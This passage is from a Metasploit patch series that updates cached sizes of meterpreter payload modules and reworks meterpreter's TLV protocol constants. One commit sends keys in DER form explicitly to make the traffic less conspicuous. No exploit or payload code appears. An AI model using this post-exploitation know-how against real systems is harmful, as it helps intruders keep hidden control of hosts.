   include Msf::Sessions::MeterpreterOptions
diff --git a/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_tcp.rb
index f3dc89c1bd4dc..95f5d59720442 100644
--- a/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_tcp.rb
+++ b/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_tcp.rb
@@ -10,7 +10,7 @@
 
 module MetasploitModule
 
-  CachedSize = 1163592
+  CachedSize = 1163520
 
   include Msf::Payload::Single
   include Msf::Sessions::MeterpreterOptions
diff --git a/modules/payloads/singles/linux/x64/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/x64/meterpreter_reverse_http.rb
index fd61c343f39ca..e861b30f0c98b 100644
--- a/modules/payloads/singles/linux/x64/meterpreter_reverse_http.rb
+++ b/modules/payloads/singles/linux/x64/meterpreter_reverse_http.rb
@@ -10,7 +10,7 @@
 
 module MetasploitModule
 
-  CachedSize = 1036536
+  CachedSize = 1032344
 
   include Msf::Payload::Single
   include Msf::Sessions::MeterpreterOptions
diff --git a/modules/payloads/singles/linux/x64/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/x64/meterpreter_reverse_https.rb
index c1c05e5320085..b52934aa3ab3b 100644
--- a/modules/payloads/singles/linux/x64/meterpreter_reverse_https.rb
+++ b/modules/payloads/singles/linux/x64/meterpreter_reverse_https.rb
@@ -10,7 +10,7 @@
 
 module MetasploitModule
 
-  CachedSize = 1036536
+  CachedSize = 1032344
 
   include Msf::Payload::Single
   include Msf::Sessions::MeterpreterOptions
diff --git a/modules/payloads/singles/linux/x64/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/x64/meterpreter_reverse_tcp.rb
index a14ec687a96e3..69247e80eed9b 100644
--- a/modules/payloads/singles/linux/x64/meterpreter_reverse_tcp.rb
+++ b/modules/payloads/singles/linux/x64/meterpreter_reverse_tcp.rb
@@ -10,7 +10,7 @@
 
 module MetasploitModule
 
-  CachedSize = 1036536
+  CachedSize = 1032344
 
   include Msf::Payload::Single
   include Msf::Sessions::MeterpreterOptions
diff --git a/modules/payloads/singles/linux/x86/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/x86/meterpreter_reverse_http.rb
index 6059c403d1d44..8be0933a97033 100644
--- a/modules/payloads/singles/linux/x86/meterpreter_reverse_http.rb
+++ b/modules/payloads/singles/linux/x86/meterpreter_reverse_http.rb
@@ -10,7 +10,7 @@
 
 module MetasploitModule
 
-  CachedSize = 1102196
+  CachedSize = 1097244
 
   include Msf::Payload::Single
   include Msf::Sessions::MeterpreterOptions
diff --git a/modules/payloads/singles/linux/x86/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/x86/meterpreter_reverse_https.rb
index e41dac3332dc9..95489b3cd69d0 100644
--- a/modules/payloads/singles/linux/x86/meterpreter_reverse_https.rb
+++ b/modules/payloads/singles/linux/x86/meterpreter_reverse_https.rb
@@ -10,7 +10,7 @@
 
 module MetasploitModule
 
-  CachedSize = 1102196
+  CachedSize = 1097244
 
   include Msf::Payload::Single
   include Msf::Sessions::MeterpreterOptions
diff --git a/modules/payloads/singles/linux/x86/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/x86/meterpreter_reverse_tcp.rb
index 95c5c229e370b..6c0d8004b0253 100644
--- a/modules/payloads/singles/linux/x86/meterpreter_reverse_tcp.rb
+++ b/modules/payloads/singles/linux/x86/meterpreter_reverse_tcp.rb
@@ -10,7 +10,7 @@
 
 module MetasploitModule
 
-  CachedSize = 1102196
+  CachedSize = 1097244
 
   include Msf::Payload::Single
   include Msf::Sessions::MeterpreterOptions
diff --git a/modules/payloads/singles/linux/zarch/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/zarch/meterpreter_reverse_http.rb
index 4e5f620f2cea2..d3ae60d720bd5 100644
--- a/modules/payloads/singles/linux/zarch/meterpreter_reverse_http.rb
+++ b/modules/payloads/singles/linux/zarch/meterpreter_reverse_http.rb
@@ -10,7 +10,7 @@
 
 module MetasploitModule
 
-  CachedSize = 1230712
+  CachedSize = 1226520
 
   include Msf::Payload::Single
   include Msf::Sessions::MeterpreterOptions
diff --git a/modules/payloads/singles/linux/zarch/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/zarch/meterpreter_reverse_https.rb
index 5f12aa5f0c38e..9489a827448aa 100644
--- a/modules/payloads/singles/linux/zarch/meterpreter_reverse_https.rb
+++ b/modules/payloads/singles/linux/zarch/meterpreter_reverse_https.rb
@@ -10,7 +10,7 @@
 
 module MetasploitModule
 
-  CachedSize = 1230712
+  CachedSize = 1226520
 
   include Msf::Payload::Single
   include Msf::Sessions::MeterpreterOptions
diff --git a/modules/payloads/singles/linux/zarch/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/zarch/meterpreter_reverse_tcp.rb
index 54b50d43416d4..4fb12ae67cbb7 100644
--- a/modules/payloads/singles/linux/zarch/meterpreter_reverse_tcp.rb
+++ b/modules/payloads/singles/linux/zarch/meterpreter_reverse_tcp.rb
@@ -10,7 +10,7 @@
 
 module MetasploitModule
 
-  CachedSize = 1230712
+  CachedSize = 1226520
 
   include Msf::Payload::Single
   include Msf::Sessions::MeterpreterOptions
diff --git a/modules/payloads/singles/osx/x64/meterpreter_reverse_http.rb b/modules/payloads/singles/osx/x64/meterpreter_reverse_http.rb
index cf1bf3c059698..f66a670dd984b 100644
--- a/modules/payloads/singles/osx/x64/meterpreter_reverse_http.rb
+++ b/modules/payloads/singles/osx/x64/meterpreter_reverse_http.rb
@@ -10,7 +10,7 @@
 
 module MetasploitModule
 
-  CachedSize = 804084
+  CachedSize = 799916
 
   include Msf::Payload::Single
   include Msf::Sessions::MeterpreterOptions
diff --git a/modules/payloads/singles/osx/x64/meterpreter_reverse_https.rb b/modules/payloads/singles/osx/x64/meterpreter_reverse_https.rb
index 2f18ae658c73c..745f9ff3fc57e 100644
--- a/modules/payloads/singles/osx/x64/meterpreter_reverse_https.rb
+++ b/modules/payloads/singles/osx/x64/meterpreter_reverse_https.rb
@@ -10,7 +10,7 @@
 
 module MetasploitModule
 
-  CachedSize = 804084
+  CachedSize = 799916
 
   include Msf::Payload::Single
   include Msf::Sessions::MeterpreterOptions
diff --git a/modules/payloads/singles/osx/x64/meterpreter_reverse_tcp.rb b/modules/payloads/singles/osx/x64/meterpreter_reverse_tcp.rb
index fe113be5982cc..7183a9411210c 100644
--- a/modules/payloads/singles/osx/x64/meterpreter_reverse_tcp.rb
+++ b/modules/payloads/singles/osx/x64/meterpreter_reverse_tcp.rb
@@ -10,7 +10,7 @@
 
 module MetasploitModule
 
-  CachedSize = 804084
+  CachedSize = 799916
 
   include Msf::Payload::Single
   include Msf::Sessions::MeterpreterOptions
diff --git a/modules/payloads/singles/php/meterpreter_reverse_tcp.rb b/modules/payloads/singles/php/meterpreter_reverse_tcp.rb
index ab559f45a3cec..d7720a0e36a3f 100644
--- a/modules/payloads/singles/php/meterpreter_reverse_tcp.rb
+++ b/modules/payloads/singles/php/meterpreter_reverse_tcp.rb
@@ -11,7 +11,7 @@
 
 module MetasploitModule
 
-  CachedSize = 30691
+  CachedSize = 34011
 
   include Msf::Payload::Single
   include Msf::Payload::Php::ReverseTcp
diff --git a/modules/payloads/singles/python/meterpreter_bind_tcp.rb b/modules/payloads/singles/python/meterpreter_bind_tcp.rb
index 26f16cfc20da6..b5a3462c3de94 100644
--- a/modules/payloads/singles/python/meterpreter_bind_tcp.rb
+++ b/modules/payloads/singles/python/meterpreter_bind_tcp.rb
@@ -11,7 +11,7 @@
 
 module MetasploitModule
 
-  CachedSize = 71945
+  CachedSize = 81293
 
   include Msf::Payload::Single
   include Msf::Payload::Python
diff --git a/modules/payloads/singles/python/meterpreter_reverse_http.rb b/modules/payloads/singles/python/meterpreter_reverse_http.rb
index f77ca89e1de37..6b1534f156743 100644
--- a/modules/payloads/singles/python/meterpreter_reverse_http.rb
+++ b/modules/payloads/singles/python/meterpreter_reverse_http.rb
@@ -11,7 +11,7 @@
 
 module MetasploitModule
 
-  CachedSize = 71913
+  CachedSize = 81261
 
   include Msf::Payload::Single
   include Msf::Payload::Python
diff --git a/modules/payloads/singles/python/meterpreter_reverse_https.rb b/modules/payloads/singles/python/meterpreter_reverse_https.rb
index b7cb94094f3a9..1b7d4976ca53b 100644
--- a/modules/payloads/singles/python/meterpreter_reverse_https.rb
+++ b/modules/payloads/singles/python/meterpreter_reverse_https.rb
@@ -11,7 +11,7 @@
 
 module MetasploitModule
 
-  CachedSize = 71913
+  CachedSize = 81261
 
   include Msf::Payload::Single
   include Msf::Payload::Python
diff --git a/modules/payloads/singles/python/meterpreter_reverse_tcp.rb b/modules/payloads/singles/python/meterpreter_reverse_tcp.rb
index ed2ceb694493c..490142bf4ab5a 100644
--- a/modules/payloads/singles/python/meterpreter_reverse_tcp.rb
+++ b/modules/payloads/singles/python/meterpreter_reverse_tcp.rb
@@ -11,7 +11,7 @@
 
 module MetasploitModule
 
-  CachedSize = 71845
+  CachedSize = 81193
 
   include Msf::Payload::Single
   include Msf::Payload::Python
diff --git a/modules/payloads/singles/windows/encrypted_shell_reverse_tcp.rb b/modules/payloads/singles/windows/encrypted_shell_reverse_tcp.rb
index 8e6c1f38e114c..2313a5a7d79e9 100644
--- a/modules/payloads/singles/windows/encrypted_shell_reverse_tcp.rb
+++ b/modules/payloads/singles/windows/encrypted_shell_reverse_tcp.rb
@@ -11,7 +11,7 @@
 
 module MetasploitModule
 
-  CachedSize = 4352
+  CachedSize = 4416
 
   include Msf::Payload::Windows
   include Msf::Payload::Single
diff --git a/modules/payloads/singles/windows/meterpreter_bind_named_pipe.rb b/modules/payloads/singles/windows/meterpreter_bind_named_pipe.rb
index 626c331b3c4df..7a297fb7c0174 100644
--- a/modules/payloads/singles/windows/meterpreter_bind_named_pipe.rb
+++ b/modules/payloads/singles/windows/meterpreter_bind_named_pipe.rb
@@ -12,7 +12,7 @@
 
 module MetasploitModule
 
-  CachedSize = 176198
+  CachedSize = 175174
 
   include Msf::Payload::TransportConfig
   include Msf::Payload::Windows
diff --git a/modules/payloads/singles/windows/meterpreter_bind_tcp.rb b/modules/payloads/singles/windows/meterpreter_bind_tcp.rb
index b84f131cf1bf8..7275dbb490b8a 100644
--- a/modules/payloads/singles/windows/meterpreter_bind_tcp.rb
+++ b/modules/payloads/singles/windows/meterpreter_bind_tcp.rb
@@ -12,7 +12,7 @@
 
 module MetasploitModule
 
-  CachedSize = 176198
+  CachedSize = 175174
 
   include Msf::Payload::TransportConfig
   include Msf::Payload::Windows
diff --git a/modules/payloads/singles/windows/meterpreter_reverse_http.rb b/modules/payloads/singles/windows/meterpreter_reverse_http.rb
index 52a59ffbc536d..c0bb7b1c974b0 100644
--- a/modules/payloads/singles/windows/meterpreter_reverse_http.rb
+++ b/modules/payloads/singles/windows/meterpreter_reverse_http.rb
@@ -12,7 +12,7 @@
 
 module MetasploitModule
 
-  CachedSize = 177244
+  CachedSize = 176220
 
   include Msf::Payload::TransportConfig
   include Msf::Payload::Windows
diff --git a/modules/payloads/singles/windows/meterpreter_reverse_https.rb b/modules/payloads/singles/windows/meterpreter_reverse_https.rb
index d1efef0e15483..388413bb30d4c 100644
--- a/modules/payloads/singles/windows/meterpreter_reverse_https.rb
+++ b/modules/payloads/singles/windows/meterpreter_reverse_https.rb
@@ -12,7 +12,7 @@
 
 module MetasploitModule
 
-  CachedSize = 177244
+  CachedSize = 176220
 
   include Msf::Payload::TransportConfig
   include Msf::Payload::Windows
diff --git a/modules/payloads/singles/windows/meterpreter_reverse_ipv6_tcp.rb b/modules/payloads/singles/windows/meterpreter_reverse_ipv6_tcp.rb
index 868c2ea691761..3e739a48360e1 100644
--- a/modules/payloads/singles/windows/meterpreter_reverse_ipv6_tcp.rb
+++ b/modules/payloads/singles/windows/meterpreter_reverse_ipv6_tcp.rb
@@ -12,7 +12,7 @@
 
 module MetasploitModule
 
-  CachedSize = 176198
+  CachedSize = 175174
 
   include Msf::Payload::TransportConfig
   include Msf::Payload::Windows
diff --git a/modules/payloads/singles/windows/meterpreter_reverse_tcp.rb b/modules/payloads/singles/windows/meterpreter_reverse_tcp.rb
index 2a109914a82d2..b4aa877a4ab44 100644
--- a/modules/payloads/singles/windows/meterpreter_reverse_tcp.rb
+++ b/modules/payloads/singles/windows/meterpreter_reverse_tcp.rb
@@ -12,7 +12,7 @@
 
 module MetasploitModule
 
-  CachedSize = 176198
+  CachedSize = 175174
 
   include Msf::Payload::TransportConfig
   include Msf::Payload::Windows
diff --git a/modules/payloads/singles/windows/x64/encrypted_shell_reverse_tcp.rb b/modules/payloads/singles/windows/x64/encrypted_shell_reverse_tcp.rb
index 8a921fe186205..53083adaf2475 100644
--- a/modules/payloads/singles/windows/x64/encrypted_shell_reverse_tcp.rb
+++ b/modules/payloads/singles/windows/x64/encrypted_shell_reverse_tcp.rb
@@ -10,7 +10,7 @@
 
 module MetasploitModule
 
-  CachedSize = 4064
+  CachedSize = 4000
 
   include Msf::Payload::Windows
   include Msf::Payload::Single
diff --git a/modules/payloads/singles/windows/x64/meterpreter_bind_named_pipe.rb b/modules/payloads/singles/windows/x64/meterpreter_bind_named_pipe.rb
index 9d5b4a167ddb6..7de4f1bdd9013 100644
--- a/modules/payloads/singles/windows/x64/meterpreter_bind_named_pipe.rb
+++ b/modules/payloads/singles/windows/x64/meterpreter_bind_named_pipe.rb
@@ -12,7 +12,7 @@
 
 module MetasploitModule
 
-  CachedSize = 201286
+  CachedSize = 199750
 
   include Msf::Payload::TransportConfig
   include Msf::Payload::Windows
diff --git a/modules/payloads/singles/windows/x64/meterpreter_bind_tcp.rb b/modules/payloads/singles/windows/x64/meterpreter_bind_tcp.rb
index 2473cb95a0243..18791f5005128 100644
--- a/modules/payloads/singles/windows/x64/meterpreter_bind_tcp.rb
+++ b/modules/payloads/singles/windows/x64/meterpreter_bind_tcp.rb
@@ -12,7 +12,7 @@
 
 module MetasploitModule
 
-  CachedSize = 201286
+  CachedSize = 199750
 
   include Msf::Payload::TransportConfig
   include Msf::Payload::Windows
diff --git a/modules/payloads/singles/windows/x64/meterpreter_reverse_http.rb b/modules/payloads/singles/windows/x64/meterpreter_reverse_http.rb
index 7dd31a44a4c4e..2477ea3b01d1c 100644
--- a/modules/payloads/singles/windows/x64/meterpreter_reverse_http.rb
+++ b/modules/payloads/singles/windows/x64/meterpreter_reverse_http.rb
@@ -12,7 +12,7 @@
 
 module MetasploitModule
 
-  CachedSize = 202332
+  CachedSize = 200796
 
   include Msf::Payload::TransportConfig
   include Msf::Payload::Windows
diff --git a/modules/payloads/singles/windows/x64/meterpreter_reverse_https.rb b/modules/payloads/singles/windows/x64/meterpreter_reverse_https.rb
index 21c0aa7535d04..49cd9d293b0e2 100644
--- a/modules/payloads/singles/windows/x64/meterpreter_reverse_https.rb
+++ b/modules/payloads/singles/windows/x64/meterpreter_reverse_https.rb
@@ -12,7 +12,7 @@
 
 module MetasploitModule
 
-  CachedSize = 202332
+  CachedSize = 200796
 
   include Msf::Payload::TransportConfig
   include Msf::Payload::Windows
diff --git a/modules/payloads/singles/windows/x64/meterpreter_reverse_ipv6_tcp.rb b/modules/payloads/singles/windows/x64/meterpreter_reverse_ipv6_tcp.rb
index a6f5a125f1745..d17572d538021 100644
--- a/modules/payloads/singles/windows/x64/meterpreter_reverse_ipv6_tcp.rb
+++ b/modules/payloads/singles/windows/x64/meterpreter_reverse_ipv6_tcp.rb
@@ -12,7 +12,7 @@
 
 module MetasploitModule
 
-  CachedSize = 201286
+  CachedSize = 199750
 
   include Msf::Payload::TransportConfig
   include Msf::Payload::Windows
diff --git a/modules/payloads/singles/windows/x64/meterpreter_reverse_tcp.rb b/modules/payloads/singles/windows/x64/meterpreter_reverse_tcp.rb
index 2a1139d0f92fe..f63565944ea48 100644
--- a/modules/payloads/singles/windows/x64/meterpreter_reverse_tcp.rb
+++ b/modules/payloads/singles/windows/x64/meterpreter_reverse_tcp.rb
@@ -12,7 +12,7 @@
 
 module MetasploitModule
 
-  CachedSize = 201286
+  CachedSize = 199750
 
   include Msf::Payload::TransportConfig
   include Msf::Payload::Windows
diff --git a/modules/payloads/stagers/windows/encrypted_reverse_tcp.rb b/modules/payloads/stagers/windows/encrypted_reverse_tcp.rb
index 6ae7561f887e8..dd2c8e7f0d3f1 100644
--- a/modules/payloads/stagers/windows/encrypted_reverse_tcp.rb
+++ b/modules/payloads/stagers/windows/encrypted_reverse_tcp.rb
@@ -8,7 +8,7 @@
 
 module MetasploitModule
 
-  CachedSize = 2848
+  CachedSize = 2880
 
   include Msf::Payload::Stager
   include Msf::Payload::Windows::EncryptedReverseTcp
diff --git a/modules/payloads/stagers/windows/x64/encrypted_reverse_tcp.rb b/modules/payloads/stagers/windows/x64/encrypted_reverse_tcp.rb
index 74f709532087b..67fb7bb327647 100644
--- a/modules/payloads/stagers/windows/x64/encrypted_reverse_tcp.rb
+++ b/modules/payloads/stagers/windows/x64/encrypted_reverse_tcp.rb
@@ -8,7 +8,7 @@
 
 module MetasploitModule
 
-  CachedSize = 2576
+  CachedSize = 2560
 
   include Msf::Payload::Stager
   include Msf::Payload::Windows::EncryptedReverseTcp

From 5b69fe97573636a58490b0ee61b1c5f0441d41d5 Mon Sep 17 00:00:00 2001
From: Brent Cook <busterb@gmail.com>
Date: Wed, 3 Jun 2020 07:27:47 -0500
Subject: [PATCH 17/20] reverse_python_ssl has has apparently stabilized in
 size

---
 spec/modules/payloads_spec.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/spec/modules/payloads_spec.rb b/spec/modules/payloads_spec.rb
index ee874d41d95ec..820f2eac7038a 100644
--- a/spec/modules/payloads_spec.rb
+++ b/spec/modules/payloads_spec.rb
@@ -953,7 +953,7 @@
                           ancestor_reference_names: [
                               'singles/cmd/unix/reverse_python_ssl'
                           ],
-                          dynamic_size: true,
+                          dynamic_size: false,
                           modules_pathname: modules_pathname,
                           reference_name: 'cmd/unix/reverse_python_ssl'
   end

From 209e463c84e507ddb764225ada7f8d05f5254898 Mon Sep 17 00:00:00 2001
From: OJ <oj@buffered.io>
Date: Wed, 6 May 2020 09:18:50 +1000
Subject: [PATCH 18/20] Pass DER-encoed public keys instead of PEM

Just to reduce the more obvious thing going across the wire (ie. no more
"BEGIN PUBLIC KEY"). We now see binary blobs.
---
 lib/rex/post/meterpreter/client_core.rb | 4 +++-
 lib/rex/post/meterpreter/packet.rb      | 3 ++-
 2 files changed, 5 insertions(+), 2 deletions(-)

diff --git a/lib/rex/post/meterpreter/client_core.rb b/lib/rex/post/meterpreter/client_core.rb
index ace583fb52501..9b71297c5f20e 100644
--- a/lib/rex/post/meterpreter/client_core.rb
+++ b/lib/rex/post/meterpreter/client_core.rb
@@ -748,9 +748,11 @@ def negotiate_tlv_encryption
     sym_key = nil
     rsa_key = OpenSSL::PKey::RSA.new(2048)
     rsa_pub_key = rsa_key.public_key
+    der = rsa_pub_key.to_der
 
     request  = Packet.create_request(COMMAND_ID_CORE_NEGOTIATE_TLV_ENCRYPTION)
-    request.add_tlv(TLV_TYPE_RSA_PUB_KEY, rsa_pub_key.to_pem)
+    request.add_tlv(TLV_TYPE_RSA_PUB_KEY, der)
+    request.add_tlv(TLV_TYPE_RSA_PUB_KEY_LEN, der.length)
 
     begin
       response = client.send_request(request)
diff --git a/lib/rex/post/meterpreter/packet.rb b/lib/rex/post/meterpreter/packet.rb
index fdbb33a60dde6..8a6e33e88d12a 100644
--- a/lib/rex/post/meterpreter/packet.rb
+++ b/lib/rex/post/meterpreter/packet.rb
@@ -109,10 +109,11 @@ module Meterpreter
 TLV_TYPE_UUID                = TLV_META_TYPE_RAW    | 461
 TLV_TYPE_SESSION_GUID        = TLV_META_TYPE_RAW    | 462
 
-TLV_TYPE_RSA_PUB_KEY         = TLV_META_TYPE_STRING | 550
+TLV_TYPE_RSA_PUB_KEY         = TLV_META_TYPE_RAW    | 550
 TLV_TYPE_SYM_KEY_TYPE        = TLV_META_TYPE_UINT   | 551
 TLV_TYPE_SYM_KEY             = TLV_META_TYPE_RAW    | 552
 TLV_TYPE_ENC_SYM_KEY         = TLV_META_TYPE_RAW    | 553
+TLV_TYPE_RSA_PUB_KEY_LEN     = TLV_META_TYPE_UINT   | 554
 
 #
 # Pivots

From 6170f497b6680e15a258a5f3a1ed42c1faf26a68 Mon Sep 17 00:00:00 2001
From: OJ <oj@buffered.io>
Date: Wed, 6 May 2020 11:34:10 +1000
Subject: [PATCH 19/20] Fix TLV types and remove ones that no longer exist

---
 lib/rex/post/meterpreter/client_core.rb           |  3 ---
 lib/rex/post/meterpreter/extensions/stdapi/tlv.rb |  6 ++----
 lib/rex/post/meterpreter/extensions/stdapi/ui.rb  |  2 --
 lib/rex/post/meterpreter/packet.rb                | 11 ++---------
 4 files changed, 4 insertions(+), 18 deletions(-)

diff --git a/lib/rex/post/meterpreter/client_core.rb b/lib/rex/post/meterpreter/client_core.rb
index 9b71297c5f20e..40f28a6f81118 100644
--- a/lib/rex/post/meterpreter/client_core.rb
+++ b/lib/rex/post/meterpreter/client_core.rb
@@ -629,9 +629,7 @@ def migrate(target_pid, writable_dir = nil, opts = {})
     request = Packet.create_request(COMMAND_ID_CORE_MIGRATE)
 
     request.add_tlv(TLV_TYPE_MIGRATE_PID, target_pid)
-    request.add_tlv(TLV_TYPE_MIGRATE_PAYLOAD_LEN, migrate_payload.length)
     request.add_tlv(TLV_TYPE_MIGRATE_PAYLOAD, migrate_payload, false, client.capabilities[:zlib])
-    request.add_tlv(TLV_TYPE_MIGRATE_STUB_LEN, migrate_stub.length)
     request.add_tlv(TLV_TYPE_MIGRATE_STUB, migrate_stub, false, client.capabilities[:zlib])
 
     if target_process['arch'] == ARCH_X64
@@ -752,7 +750,6 @@ def negotiate_tlv_encryption
 
     request  = Packet.create_request(COMMAND_ID_CORE_NEGOTIATE_TLV_ENCRYPTION)
     request.add_tlv(TLV_TYPE_RSA_PUB_KEY, der)
-    request.add_tlv(TLV_TYPE_RSA_PUB_KEY_LEN, der.length)
 
     begin
       response = client.send_request(request)
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/tlv.rb b/lib/rex/post/meterpreter/extensions/stdapi/tlv.rb
index 14feacef4b0be..95c77e18df471 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/tlv.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/tlv.rb
@@ -202,10 +202,8 @@ module Stdapi
 TLV_TYPE_DESKTOP_STATION                   = TLV_META_TYPE_STRING | 3006
 TLV_TYPE_DESKTOP_NAME                      = TLV_META_TYPE_STRING | 3007
 TLV_TYPE_DESKTOP_SCREENSHOT_QUALITY        = TLV_META_TYPE_UINT   | 3008
-TLV_TYPE_DESKTOP_SCREENSHOT_PE32DLL_LENGTH = TLV_META_TYPE_UINT   | 3009
-TLV_TYPE_DESKTOP_SCREENSHOT_PE32DLL_BUFFER = TLV_META_TYPE_STRING | 3010
-TLV_TYPE_DESKTOP_SCREENSHOT_PE64DLL_LENGTH = TLV_META_TYPE_UINT   | 3011
-TLV_TYPE_DESKTOP_SCREENSHOT_PE64DLL_BUFFER = TLV_META_TYPE_STRING | 3012
+TLV_TYPE_DESKTOP_SCREENSHOT_PE32DLL_BUFFER = TLV_META_TYPE_RAW    | 3010
+TLV_TYPE_DESKTOP_SCREENSHOT_PE64DLL_BUFFER = TLV_META_TYPE_RAW    | 3012
 TLV_TYPE_KEYSCAN_TRACK_ACTIVE_WINDOW       = TLV_META_TYPE_BOOL   | 3013
 TLV_TYPE_KEYS_SEND                         = TLV_META_TYPE_STRING | 3014
 TLV_TYPE_MOUSE_ACTION                      = TLV_META_TYPE_UINT   | 3015
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/ui.rb b/lib/rex/post/meterpreter/extensions/stdapi/ui.rb
index 18b355c0a345a..11f3d2aca9f0f 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/ui.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/ui.rb
@@ -191,7 +191,6 @@ def screenshot( quality=50 )
         end
 
         request.add_tlv( TLV_TYPE_DESKTOP_SCREENSHOT_PE64DLL_BUFFER, screenshot_dll, false, true )
-        request.add_tlv( TLV_TYPE_DESKTOP_SCREENSHOT_PE64DLL_LENGTH, screenshot_dll.length )
       end
 
       # but always include the x86 screenshot dll as we can use it for wow64 processes if we are on x64
@@ -206,7 +205,6 @@ def screenshot( quality=50 )
       end
 
       request.add_tlv( TLV_TYPE_DESKTOP_SCREENSHOT_PE32DLL_BUFFER, screenshot_dll, false, true )
-      request.add_tlv( TLV_TYPE_DESKTOP_SCREENSHOT_PE32DLL_LENGTH, screenshot_dll.length )
     end
 
     # send the request and return the jpeg image if successfull.
diff --git a/lib/rex/post/meterpreter/packet.rb b/lib/rex/post/meterpreter/packet.rb
index 8a6e33e88d12a..624d58f44d633 100644
--- a/lib/rex/post/meterpreter/packet.rb
+++ b/lib/rex/post/meterpreter/packet.rb
@@ -81,14 +81,12 @@ module Meterpreter
 TLV_TYPE_LIBRARY_PATH        = TLV_META_TYPE_STRING | 400
 TLV_TYPE_TARGET_PATH         = TLV_META_TYPE_STRING | 401
 TLV_TYPE_MIGRATE_PID         = TLV_META_TYPE_UINT   | 402
-TLV_TYPE_MIGRATE_PAYLOAD_LEN = TLV_META_TYPE_UINT   | 403
-TLV_TYPE_MIGRATE_PAYLOAD     = TLV_META_TYPE_STRING | 404
+TLV_TYPE_MIGRATE_PAYLOAD     = TLV_META_TYPE_RAW    | 404
 TLV_TYPE_MIGRATE_ARCH        = TLV_META_TYPE_UINT   | 405
 TLV_TYPE_MIGRATE_BASE_ADDR   = TLV_META_TYPE_UINT   | 407
 TLV_TYPE_MIGRATE_ENTRY_POINT = TLV_META_TYPE_UINT   | 408
 TLV_TYPE_MIGRATE_SOCKET_PATH = TLV_META_TYPE_STRING | 409
-TLV_TYPE_MIGRATE_STUB_LEN    = TLV_META_TYPE_UINT   | 410
-TLV_TYPE_MIGRATE_STUB        = TLV_META_TYPE_STRING | 411
+TLV_TYPE_MIGRATE_STUB        = TLV_META_TYPE_RAW    | 411
 
 
 TLV_TYPE_TRANS_TYPE          = TLV_META_TYPE_UINT   | 430
@@ -113,14 +111,12 @@ module Meterpreter
 TLV_TYPE_SYM_KEY_TYPE        = TLV_META_TYPE_UINT   | 551
 TLV_TYPE_SYM_KEY             = TLV_META_TYPE_RAW    | 552
 TLV_TYPE_ENC_SYM_KEY         = TLV_META_TYPE_RAW    | 553
-TLV_TYPE_RSA_PUB_KEY_LEN     = TLV_META_TYPE_UINT   | 554
 
 #
 # Pivots
 #
 TLV_TYPE_PIVOT_ID              = TLV_META_TYPE_RAW    |  650
 TLV_TYPE_PIVOT_STAGE_DATA      = TLV_META_TYPE_RAW    |  651
-TLV_TYPE_PIVOT_STAGE_DATA_SIZE = TLV_META_TYPE_UINT   |  652
 TLV_TYPE_PIVOT_NAMED_PIPE_NAME = TLV_META_TYPE_STRING |  653
 
 
@@ -218,12 +214,10 @@ def inspect
       when TLV_TYPE_LIBRARY_PATH; "LIBRARY-PATH"
       when TLV_TYPE_TARGET_PATH; "TARGET-PATH"
       when TLV_TYPE_MIGRATE_PID; "MIGRATE-PID"
-      when TLV_TYPE_MIGRATE_PAYLOAD_LEN; "MIGRATE-PAYLOAD-LEN"
       when TLV_TYPE_MIGRATE_PAYLOAD; "MIGRATE-PAYLOAD"
       when TLV_TYPE_MIGRATE_ARCH; "MIGRATE-ARCH"
       when TLV_TYPE_MIGRATE_BASE_ADDR; "MIGRATE-BASE-ADDR"
       when TLV_TYPE_MIGRATE_ENTRY_POINT; "MIGRATE-ENTRY-POINT"
-      when TLV_TYPE_MIGRATE_STUB_LEN; "MIGRATE-STUB-LEN"
       when TLV_TYPE_MIGRATE_STUB; "MIGRATE-STUB"
       when TLV_TYPE_MIGRATE_SOCKET_PATH; "MIGRATE-SOCKET-PATH"
       when TLV_TYPE_TRANS_TYPE; "TRANS-TYPE"
@@ -246,7 +240,6 @@ def inspect
 
       when TLV_TYPE_PIVOT_ID; "PIVOT-ID"
       when TLV_TYPE_PIVOT_STAGE_DATA; "PIVOT-STAGE-DATA"
-      when TLV_TYPE_PIVOT_STAGE_DATA_SIZE; "PIVOT-STAGE-DATA-SIZE"
       when TLV_TYPE_PIVOT_NAMED_PIPE_NAME; "PIVOT-NAMED-PIPE-NAME"
 
       #when Extensions::Stdapi::TLV_TYPE_NETWORK_INTERFACE; 'network-interface'

From d1cfbb09826f5f2987eceb0f4f9c528d87f243ff Mon Sep 17 00:00:00 2001
From: OJ <oj@buffered.io>
Date: Wed, 6 May 2020 11:47:37 +1000
Subject: [PATCH 20/20] Removal of unnecessary local var

---
 lib/rex/post/meterpreter/client_core.rb | 3 +--
 1 file changed, 1 insertion(+), 2 deletions(-)

diff --git a/lib/rex/post/meterpreter/client_core.rb b/lib/rex/post/meterpreter/client_core.rb
index 40f28a6f81118..056a592271ef5 100644
--- a/lib/rex/post/meterpreter/client_core.rb
+++ b/lib/rex/post/meterpreter/client_core.rb
@@ -746,10 +746,9 @@ def negotiate_tlv_encryption
     sym_key = nil
     rsa_key = OpenSSL::PKey::RSA.new(2048)
     rsa_pub_key = rsa_key.public_key
-    der = rsa_pub_key.to_der
 
     request  = Packet.create_request(COMMAND_ID_CORE_NEGOTIATE_TLV_ENCRYPTION)
-    request.add_tlv(TLV_TYPE_RSA_PUB_KEY, der)
+    request.add_tlv(TLV_TYPE_RSA_PUB_KEY, rsa_pub_key.to_der)
 
     begin
       response = client.send_request(request)